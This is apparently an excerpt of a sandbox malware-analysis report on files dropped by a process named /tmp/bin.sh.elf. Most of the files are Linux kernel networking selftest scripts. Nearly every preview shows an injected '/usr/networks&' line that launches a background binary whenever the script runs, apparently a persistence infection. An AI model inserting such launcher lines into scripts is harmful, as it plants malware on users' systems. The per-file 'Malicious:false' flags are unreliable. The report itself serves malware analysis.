                                                                        Preview:./usr/networks&.# set global exit status, but never reset nonzero one..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..# same but inverted -- used when command must fail for test to pass.check_fail().{..if [ $1 -eq 0 ]; then...ret=1..fi.}..kci_add_dummy().{..ip link add name "$devdummy" type dummy..check_err $?..ip link set "$devdummy" up..check_err $?.}..kci_del_dummy().{..ip link del dev "$devdummy"..check_err $?.}..kci_test_netconf().{..dev="$1"..r=$ret...ip netconf show dev "$dev" > /dev/null..check_err $?...for f in 4 6; do...ip -$f netconf show dev "$dev" > /dev/null...check_err $?..done...if [ $ret -ne 0 ] ;then...echo "FAIL: ip netconf show $dev"...test $r -eq 0 && ret=0...return 1..fi.}..# add a bridge with vlans on top.kci_test_bridge().{..devbr="test-br0"..vlandev="testbr-vlan1"...local ret=0..ip link add name "$devbr" type bridge..check_err $?...ip link set dev "$devdummy" master "$devbr"..check_err $?...ip link set "$devbr" up..check_err $?...ip link add link "$devb
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):656
                                                                        Entropy (8bit):4.8250605751068365
                                                                        Encrypted:false
                                                                        SSDEEP:12:LHMHDFIJQDFIJc/DFIJ0/DFIJs/DFIJH26zxGkFbwDFIJ6CDFIJJoDFIJUvDFIJm:LHMHDFIJQDFIJKDFIJCDFIJaDFIJdxjz
                                                                        MD5:53337CAEED6C138D63B0E15D58EC25D9
                                                                        SHA1:0E93369E52555A57951321A297B191ED623E513B
                                                                        SHA-256:619047CB4E304B0D3855233EA3AB615E439C64714B45BFD733E8AB9F20CBFDCD
                                                                        SHA-512:D4CA977EAD46EB46AF4B9CD78EAB3F93B2C350DBE164EAC25F9A4FFC4189562485DAABA91E50BD135B3395F6482E51F825364851E16B840960E698B399742467
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $?.fi..set -e..tc qdisc add dev lo root fq../so_txtime -4 -6 -c mono a,-1 a,-1../so_txtime -4 -6 -c mono a,0 a,0../so_txtime -4 -6 -c mono a,10 a,10../so_txtime -4 -6 -c mono a,10,b,20 a,10,b,20../so_txtime -4 -6 -c mono a,20,b,10 b,20,a,20..if tc qdisc replace dev lo root etf clockid CLOCK_TAI delta 400000; then..! ./so_txtime -4 -6 -c tai a,-1 a,-1..! ./so_txtime -4 -6 -c tai a,0 a,0.../so_txtime -4 -6 -c tai a,10 a,10.../so_txtime -4 -6 -c tai a,10,b,20 a,10,b,20.../so_txtime -4 -6 -c tai a,20,b,10 b,10,a,20.else..echo "tc ($(tc -V)) does not support qdisc etf. skipping".fi..echo OK. All tests passed../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):51
                                                                        Entropy (8bit):4.0566141271368545
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaUSXVOORgn:RMn
                                                                        MD5:25486302E2F79E715F71224880891FB0
                                                                        SHA1:558D33B331F487C6617CEDBDCEC691FC47647B88
                                                                        SHA-256:850754C348CF66F7EB60CD7F6C452215A466AD2A5EC5D9F64FAB9335ABF40183
                                                                        SHA-512:AB584D017C9D3A4BD2D62B6874C6AF315EC308EDA10BD38B97D704013505F7E7E1FFA1D07FA0B29E40515469E4B95D61D291A468D2353F65F2B83813631EA673
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1;.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):51
                                                                        Entropy (8bit):4.0566141271368545
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaUSXVOORgn:RMn
                                                                        MD5:25486302E2F79E715F71224880891FB0
                                                                        SHA1:558D33B331F487C6617CEDBDCEC691FC47647B88
                                                                        SHA-256:850754C348CF66F7EB60CD7F6C452215A466AD2A5EC5D9F64FAB9335ABF40183
                                                                        SHA-512:AB584D017C9D3A4BD2D62B6874C6AF315EC308EDA10BD38B97D704013505F7E7E1FFA1D07FA0B29E40515469E4B95D61D291A468D2353F65F2B83813631EA673
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1;.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2382
                                                                        Entropy (8bit):4.741658396321069
                                                                        Encrypted:false
                                                                        SSDEEP:48:yLLMtE5wKhzJ6YbFCB9BMT4J4uGZTG/A8:ynMtE5wK9U3MT42ttGv
                                                                        MD5:E9155DD4BB8D021515B8E1FB4DF3F1D9
                                                                        SHA1:02CF9F008F0650C56BB20933DF10671487B48C32
                                                                        SHA-256:5EE5E55DBE08499E7DB792B6568D62E8ADDAD3E83301B0AA0964D7BEB04AEDE6
                                                                        SHA-512:50E24943AB337B25BF2A8817797821D0CC8F2B5081535E89C353B3E2A141F11B5671F7407102933D34A1AFA0F5F545581DC26F5296FAF08EB60B132133BB313E
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.[[ $1 == "clean" ]] && exit 0..trap cleanup EXIT..# Setup "Hypervisors" simulated with netns.ip link add veth-hv-1 type veth peer name veth-hv-2.setup-hv-networking() {. hv=$1.. ip netns add hv-$hv. ip link set veth-hv-$hv netns hv-$hv. ip -netns hv-$hv link set veth-hv-$hv name veth0.. ip -netns hv-$hv link add vrf-underlay type vrf table 1. ip -netns hv-$hv link set vrf-underlay up. ip -netns hv-$hv addr add 172.16.0.$hv/24 dev veth0. ip -netns hv-$hv link set veth0 up.. ip -netns hv-$hv link add br0 type bridge. ip -netns hv-$hv link set br0 up.. ip -netns hv-$hv link add vxlan0 type vxlan id 10 local 172.16.0.$hv dev veth0 dstport 4789. ip -netns hv-$hv link set vxlan0 master br0. ip -netns hv-$hv link set vxlan0 up.}.setup-hv-networking 1.setup-hv-networking 2..# Check connectivity between HVs by pinging hv-2 from hv-1.echo -n "Checking HV connectivity ".ip netns exec hv-1 ping -c 1 -W
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5641
                                                                        Entropy (8bit):5.313892425850938
                                                                        Encrypted:false
                                                                        SSDEEP:96:plMw5r4X2+JC+F0112mpdNo1F0JyuclvZYCXmp99F01145Rmmpd8U4c76EBgB3qE:plP5HyG6QcUrTpr9c9qXgXeYWpbXfXh0
                                                                        MD5:DB3D15135543C92A59182516B05220DA
                                                                        SHA1:97D47FA6E4ED35EDC4D696879AC6C413437807CD
                                                                        SHA-256:20EE7F91469500AA440CBC16382B6B247DF6BF25B3062A50CDDB336305DA35C9
                                                                        SHA-512:B4D3369752599489BC7CC698580615857FAB45B8B1FA855E62EB0A26E260B78505BBB0920E0324D8C1252A62F354AA4C6D0936EA918DC2F8F41A81D76E362A80
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.# set global exit status, but never reset nonzero one..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..cleanup() {..local -r jobs="$(jobs -p)"..local -r ns="$(ip netns list|grep $PEER_NS)"...[ -n "${jobs}" ] && kill -1 ${jobs} 2>/dev/null..[ -n "$ns" ] && ip netns del $ns 2>/dev/null.}.trap cleanup EXIT..cfg_veth() {..ip netns add "${PEER_NS}"..ip -netns "${PEER_NS}" link set lo up..ip link add type veth..ip link set dev veth0 up..ip addr add dev veth0 192.168.1.2/24..ip addr add dev veth0 2001:db8::2/64 nodad...ip link set dev veth1 netns "${PEER_NS}"..ip -netns "${PEER_NS}" addr add dev veth1 192.168.1.1/24..ip -netns "${PEER_NS}" addr add dev veth1 2001:db8::1/64 nodad..ip -netns "${PEER_NS}" link set dev veth1 up..ip -n "${PEER_NS}" link set veth1 xdp object ../bpf/xdp_dummy.o section xdp_dummy.}..run_one() {..# use 'rx' as separator between sender args and receiver args..local -r all="$@"..local -r tx_args=${all%rx*}..local -r rx_args=${all#*rx}...cfg_veth..
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):167
                                                                        Entropy (8bit):4.694318956835895
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaBMAG2FVFUFrOrJhidYYY6X/AF1GtP88YK76MLg0LC1jDXVOORgn:LhVlhiTXX/A7lK76Kr2NMn
                                                                        MD5:D06578C3F54C37737723D227F5A79A73
                                                                        SHA1:B4FFDEA60E2C90C9C9F29C57BADF2CB22F4ACBCD
                                                                        SHA-256:8EDB5712A96D724B1A85C888EE66221059A1E5EB79F81F3789A05461488CE667
                                                                        SHA-512:7C1FA97A41C1A27891F2E43E6D7D3ABB88BF3B13540E3D1A22E8E3CE6F182A6059E46EF563B8D6330F7773646231FC11FC5D5E126FC704EB6F176016DC35D957
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit -1.fi..if [[ $# -eq 0 ]]; then..run_all.elif [[ $1 == "__subprocess" ]]; then..shift..run_one $@.else..run_in_netns $@.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2151
                                                                        Entropy (8bit):5.261578154191124
                                                                        Encrypted:false
                                                                        SSDEEP:48:wdh6P+cigZGpRFcXe35Pmhs/VSKKPQhw4bqMDSH8K3ZMiFyiu:s6P+cij+Xe0F4O4eMu5dNu
                                                                        MD5:10DFDD7A55089A036920280CDDBA5BD1
                                                                        SHA1:48ED095C8FA4B83E51E14A3E2A6037AAE4AFC92D
                                                                        SHA-256:A431152B32EB648D990F0EC1378859E969EA4FD29BF906F1053B15E5646FACF4
                                                                        SHA-512:09F6F953329565B60537D579F245D1B588C990C2740DB793D7D6AF11E1315A524443EACBC41D748FEE6936AAAB5453337B7F93A54CC9FD82C4A2550FE26EA3C4
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.kselftest_test_exitcode() {..local -r exitcode=$1...if [[ ${exitcode} -eq ${KSFT_PASS} ]]; then...num_pass=$(( $num_pass + 1 ))..elif [[ ${exitcode} -eq ${KSFT_SKIP} ]]; then...num_skip=$(( $num_skip + 1 ))..else...num_err=$(( $num_err + 1 ))..fi.}..kselftest_exit() {..echo -e "$(basename $0): PASS=${num_pass} SKIP=${num_skip} FAIL=${num_err}"...if [[ $num_err -ne 0 ]]; then...echo -e "$(basename $0): ${RED}FAIL${NC}"...exit ${KSFT_FAIL}..fi...if [[ $num_skip -ne 0 ]]; then...echo -e "$(basename $0): ${YELLOW}SKIP${NC}"...exit ${KSFT_SKIP}..fi...echo -e "$(basename $0): ${GREEN}PASS${NC}"..exit ${KSFT_PASS}.}..wake_children() {..local -r jobs="$(jobs -p)"...if [[ "${jobs}" != "" ]]; then...kill -1 ${jobs} 2>/dev/null..fi.}.trap wake_children EXIT..run_one() {..local -r args=$@..../udpgso_bench_rx &.../udpgso_bench_rx -t &..../udpgso_bench_tx ${args}.}..run_in_netns() {..local -r args=$@..../in_netns.sh $0 __subprocess ${args}..kselftest_test_exitcode $?.}..run_udp() {..
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):7692
                                                                        Entropy (8bit):5.076292397526648
                                                                        Encrypted:false
                                                                        SSDEEP:192:ujRQNQ6TpjT0TNJPSoXHyHSnA8A2DPiXeymgC:u36UPiX0gC
                                                                        MD5:EC62E99FBDF27537E608D7238EC09262
                                                                        SHA1:A5E2021688DA3FF89736841FC3FA5B6363280F37
                                                                        SHA-256:01FE9D1FF4970B2D8A86E820A4514852581AA8C45C19C821872CEB151C79AFF9
                                                                        SHA-512:11C9B295798FBD7EBD691CF0A006857CC33388938D015EE6AA14CBF9C632CA8ECFF65207DB170E31B487B612349870062E7218CAB6F6DCDDF3F885F94F1FCBFD
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....exit 0...elif [ x"$c" = x ]; then....echo "ERROR: No counters"....ret=1....exit 111...else....exit 1...fi..).}..check_xfrm() {..# 0: iptables -m policy rule count == 0..# 1: iptables -m policy rule count != 0..rval=$1..ip=$2..local lret=0...ip netns exec ns1 ping -q -c 1 10.0.2.$ip > /dev/null...check_ipt_policy_count ns3..if [ $? -ne $rval ] ; then...lret=1..fi..check_ipt_policy_count ns4..if [ $? -ne $rval ] ; then...lret=1..fi...ip netns exec ns2 ping -q -c 1 10.0.1.$ip > /dev/null...check_ipt_policy_count ns3..if [ $? -ne $rval ] ; then...lret=1..fi..check_ipt_policy_count ns4..if [ $? -ne $rval ] ; then...lret=1..fi...return $lret.}..check_exceptions().{..logpostfix="$1"..local lret=0...# ping to .254 should be excluded from the tunnel (exception is in place)...check_xfrm 0 254..if [ $? -ne 0 ]; then...echo "FAIL: expected ping to .254 to fail ($logpostfix)"...lret=1..else...echo "PASS: ping to .254 bypassed ipsec tunnel ($logpostfix)"..fi...# ping to .253 shoul
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3636
                                                                        Entropy (8bit):4.929082746023161
                                                                        Encrypted:false
                                                                        SSDEEP:96:vt9Z1NPWAzvCkqWb3o4f+1bD4otWzUD81bZ1FI92Wr:Hs5XKQ1bD4uyU41bLFI92C
                                                                        MD5:66A4827A56BD561933E2CD68ED1D5667
                                                                        SHA1:46885F18DA976030D9866102505F99E78FC52013
                                                                        SHA-256:5FC4BCFD5D1FD4F2677CDA8385118F8AA52B2AA99A08CFB70EBD282B4B82F123
                                                                        SHA-512:17EEA69BC464219FAEC241AA97F6A41A064D13413EDDC04CA3FE792FA3941E122C8CE1EA8946092C8996A07F63103E963F03A7FEC8E07A7213D28D294E8B9E15
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..ip netns add ns0.ip netns add ns1.ip netns add ns2..ip link add veth0 netns ns0 type veth peer name eth0 netns ns1.if [ $? -ne 0 ]; then..echo "SKIP: Can't create veth device"..exit $ksft_skip.fi.ip link add veth1 netns ns0 type veth peer name eth0 netns ns2..ip -net ns0 link set lo up.ip -net ns0 link set veth0 up.ip -net ns0 link set veth1 up..ip -net ns0 link add br0 type bridge.if [ $? -ne 0 ]; then..echo "SKIP: Can't create bridge br0"..exit $ksft_skip.fi..ip -net ns0 link set veth0 master br0.ip -net ns0 link set veth1 master br0.ip -net ns0 link set br0 up.ip -net ns0 addr add 10.0.0.1/24 dev br0..# place both in same subnet, ns1 and ns2 connected via ns0:br0.for i in 1 2; do. ip -net ns$i link set lo up. ip -net ns$i link set eth0 up. ip -net ns$i addr add 10.0.0.1$i/24 dev eth0.done..test_ebtables_broute().{..local cipt
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):6622
                                                                        Entropy (8bit):4.91579619605947
                                                                        Encrypted:false
                                                                        SSDEEP:96:vZ7CPUMjBgqgxCXlulvNbpOZx9bFPpM5q2UqJtgHUWEBOviujpADpAJg0HH/WR46:2JJ+hUDHUzBEjpADpAfHuos
                                                                        MD5:5E544700755CD6FED0B8A72B23D78EB2
                                                                        SHA1:8FC99822C2E197DD641D4785BC406A63C7B88998
                                                                        SHA-256:A71032EA3EBFAC3F5A14B22D6E5B2E79CAC7A89A1A39FA932214DF05A5E1B2E7
                                                                        SHA-512:73F74BDA01D6ACE01066512D2C6D817CEDBC13EA3214A6467FBD50817E868CD74B2B049E93BE3BCBB1BD174B8D3DC6FA8F3AB18A3DB92A608E70DD2715F82179
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..cleanup() {..for i in 1 2;do ip netns del nsclient$i;done..for i in 1 2;do ip netns del nsrouter$i;done.}..ipv4() {. echo -n 192.168.$1.2.}..ipv6 () {. echo -n dead:$1::2.}..check_counter().{..ns=$1..name=$2..expect=$3..local lret=0...cnt=$(ip netns exec $ns nft list counter inet filter "$name" | grep -q "$expect")..if [ $? -ne 0 ]; then...echo "ERROR: counter $name in $ns has unexpected value (expected $expect)" 1>&2...ip netns exec $ns nft list counter inet filter "$name" 1>&2...lret=1..fi...return $lret.}..check_unknown().{..expect="packets 0 bytes 0"..for n in nsclient1 nsclient2 nsrouter1 nsrouter2; do...check_counter $n "unknown" "$expect"...if [ $? -ne 0 ] ;then....return 1...fi..done...return 0.}..for n in nsclient1 nsclient2 nsrouter1 nsrouter2; do. ip netns add $n. ip -net $n link set lo up.done..DEV=veth0.ip link
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):9104
                                                                        Entropy (8bit):4.993956144361954
                                                                        Encrypted:false
                                                                        SSDEEP:192:8WtZYzpcq5LETzC1QjgdykepWAgWyzUgJyASkKQSyrer:LAyOdykRWyDJyGner
                                                                        MD5:3B3A3BA397804C48A47D092CF3BD7B3C
                                                                        SHA1:4A1511BBE56343B7D955290FE420E1196B248AA3
                                                                        SHA-256:A7583B71512F4C76A592BEF41C12DBD8B2090AB9B88FA10719757C4F4D80AFDC
                                                                        SHA-512:17477BEEFEFA2F96D1F183ABFDD4E3D4F956864F452F4BC566F3F46A0C876D01DED6C80D498AE127811A0ED1185AD69F81DA5ADFDD358FEBE1A2487B0AF80824
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..which nc > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without nc (netcat)"..exit $ksft_skip.fi..ip netns add nsr1.if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace"..exit $ksft_skip.fi..ip netns add ns1.ip netns add ns2..ip netns add nsr2..cleanup() {..for i in 1 2; do...ip netns del ns$i...ip netns del nsr$i..done...rm -f "$ns1in" "$ns1out"..rm -f "$ns2in" "$ns2out"...[ $log_netns -eq 0 ] && sysctl -q net.netfilter.nf_log_all_netns=$log_netns.}..trap cleanup EXIT..sysctl -q net.netfilter.nf_log_all_netns=1..ip link add veth0 netns nsr1 type veth peer name eth0 netns ns1.ip link add veth1 netns nsr1 type veth peer name veth0 netns nsr2..ip link add veth1 netns nsr2 type veth peer name eth0 netns ns2..for dev in lo veth0 veth1; do. for i in 1 2; do. ip -net nsr$i link set $dev up. done.do
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):21529
                                                                        Entropy (8bit):4.944841471342032
                                                                        Encrypted:false
                                                                        SSDEEP:192:8MnpSIYJQ3jmb6cC/pAQ+bavzarpAQuPIUFdRlVOqKWRrLud9di+w0EJ40vl5KDD:8FsQdi+w0040N5K/
                                                                        MD5:1FD676FA6690E761EF1A76EB1A08EBDC
                                                                        SHA1:38DB532AAE0CDBE6D9DB363266A5AFEFA679436C
                                                                        SHA-256:E2B8767EF667EC952B86C445B087D1A5F2494A08E4E9345F7413EEF5323B5837
                                                                        SHA-512:E415DDC72BDE994DF60138563F617FB674A310F3776DEB09E1DD7B6A583D4A1928B72890794BDFFE9E4774D4998DB701634D8602FBC7FC71BF75998383C3D2F2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..ip netns add "$ns0".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns0"..exit $ksft_skip.fi..trap cleanup EXIT..ip netns add "$ns1".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns1"..exit $ksft_skip.fi..ip netns add "$ns2".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns2"..exit $ksft_skip.fi..ip link add veth0 netns "$ns0" type veth peer name eth0 netns "$ns1" > /dev/null 2>&1.if [ $? -ne 0 ];then. echo "SKIP: No virtual ethernet pair device support in kernel". exit $ksft_skip.fi.ip link add veth1 netns "$ns0" type veth peer name eth0 netns "$ns2"..ip -net "$ns0" link set lo up.ip -net "$ns0" link set veth0 up.ip -net "$ns0" addr add 10.0.1.1/24 dev veth0.ip -net "$ns0" addr add dead:1::1/64 dev veth0..ip -net "$ns0" link set veth1 up.ip -net "$ns0" addr add 10.0.2.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1506
                                                                        Entropy (8bit):5.015913062594834
                                                                        Encrypted:false
                                                                        SSDEEP:24:wK81nFnUenSen3izLx5zLxKfN7wUv4ydmufT8X9/C/XWrgWeqZD9Eu/A9wj:vQnFD9Sz/z09pv4x6oX9lgZqHE+A9A
                                                                        MD5:6838568F3F4859EAF69385064BBE4C8B
                                                                        SHA1:CBAD50C89D792DD100CA08E2AE9B0798D6D5E68E
                                                                        SHA-256:BB56D10B4E73554C91F138E4E3A0A0C377D1E684C9B435032FCE25A08184B0B9
                                                                        SHA-512:790CA81D1498CC5411C124307E48BF4FD778EFFB2EC9328A0B9AD2C0CCA4F2C74D4872AF768E7C4D480799AAF6EFEECDBD281709269861183895181DAF13C8AB
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..tmp=$(mktemp)..for table in $tables; do..echo add table inet "$table" >> "$tmp"..echo flush table inet "$table" >> "$tmp"...echo "add chain inet $table INPUT { type filter hook input priority 0; }" >> "$tmp"..echo "add chain inet $table OUTPUT { type filter hook output priority 0; }" >> "$tmp"..for c in $(seq 1 400); do...chain=$(printf "chain%03u" "$c")...echo "add chain inet $table $chain" >> "$tmp"..done...for c in $(seq 1 400); do...chain=$(printf "chain%03u" "$c")...for BASE in INPUT OUTPUT; do....echo "add rule inet $table $BASE counter jump $chain" >> "$tmp"...done...echo "add rule inet $table $chain counter return" >> "$tmp"..done.done..ip netns add "$testns".ip -netns "$testns" link set lo up..lscpu | grep ^CPU\(s\): | ( read cpu cpunum ;.cpunum=$((cpunum-1)).for i in $(seq 0 $cpunum);do..mask=$(printf 0x%x $((1<<$i))).
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):11276
                                                                        Entropy (8bit):5.481780874362443
                                                                        Encrypted:false
                                                                        SSDEEP:192:oxDgsOvsSFyeLy0KBhKWhht8J5S/Y6pJd893YeAQILa1DbAuUIJDeex7:sDgsOPLuhBr/23BZIW5QeN
                                                                        MD5:D704E5F5EA3C647ED057513B91E63912
                                                                        SHA1:938A32825B0FAB4074A06E41063AA6F4A5A43F0E
                                                                        SHA-256:8C1E2070D7A4B8EC686C7BB3C1F47504A37779D2910E3113BBD5CDF17E2C7F2E
                                                                        SHA-512:74BE734ACF94A06063A9961DD1EBC03709C7DB5DFA0BD8C37A5E83F999CA9167B00DEEAB17795C472EEDE472E31094787E7489C5105F53F168F4048E9B46A393
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..echo " -C don't cleanup ntb modules on exit"..echo " -h show this help message"..echo " -l list available local and remote PCI ids"..echo " -r REMOTE_HOST specify the remote's hostname to connect"..echo " to for the test (using ssh)"..echo " -m MW_SIZE memory window size for ntb_tool"..echo " (default: $MW_SIZE)"..echo " -d run dma tests for ntb_perf"..echo " -p ORDER total data order for ntb_perf"..echo " (default: $PERF_RUN_ORDER)"..echo " -w MAX_MW_SIZE maxmium memory window size for ntb_perf"..echo.}..function parse_args().{..OPTIND=0..while getopts "b:Cdhlm:r:p:w:" opt; do...case "$opt" in...C) DONT_CLEANUP=1 ;;...d) RUN_DMA_TESTS=1 ;;...h) show_help; exit 0 ;;...l) LIST_DEVS=TRUE ;;...m) MW_SIZE=${OPTARG} ;;...r) REMOTE_HOST=${OPTARG} ;;...p) PERF_RUN_ORDER=${OPTARG} ;;...w) MAX_MW_SIZE=${OPTARG} ;;...\?)... echo "Invalid option:
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2139
                                                                        Entropy (8bit):5.010147811831499
                                                                        Encrypted:false
                                                                        SSDEEP:48:z5WLypbyFmW+cNFV7VhRkcxxAlxOVAcN0CCGH8:rpbA7VhRk8UaAjCC+8
                                                                        MD5:BFB55229CC292549DDFC7412E29BE715
                                                                        SHA1:BC6A50A6CB491893D1AFEBD63E8DA5A554183DFB
                                                                        SHA-256:B6DCC9E346F07819CBFDF2B697A5D0039DBA97D1E2DC4641FA90070F035C1568
                                                                        SHA-512:3B33CE04BE3512FB7E4E995657A60BB9A45D1CA0ABA695910EC1B2FBC1620E4BFD2A5B16D33AFCC33D0F457E0B852C0ED6A0A8B1B18E77643FA16BFAC51CDD33
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $KSELFTESTS_SKIP;.fi..if [ ! -e "/sys/kernel/debug/powerpc/eeh_dev_check" ] && \. [ ! -e "/sys/kernel/debug/powerpc/eeh_dev_break" ] ; then..echo "debugfs EEH testing files are missing. Is debugfs mounted?"..exit $KSELFTESTS_SKIP;.fi..pre_lspci=`mktemp`.lspci > $pre_lspci..# Bump the max freeze count to something absurd so we don't.# trip over it while breaking things..echo 5000 > /sys/kernel/debug/powerpc/eeh_max_freezes..# record the devices that we break in here. Assuming everything.# goes to plan we should get them back once the recover process.# is finished..devices=""..# Build up a list of candidate devices..for dev in `ls -1 /sys/bus/pci/devices/ | grep '\.0$'` ; do..# skip bridges since we can't recover them (yet...)..if [ -e "/sys/bus/pci/devices/$dev/pci_bus" ] ; then...echo "$dev, Skipped: bridge"...continue;..fi...# Skip VFs for now since we don't have a reliable way..# to break them...if [ -e "/sys/bus/pci/devices/$dev/physfn" ] ; then...echo "$dev,
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
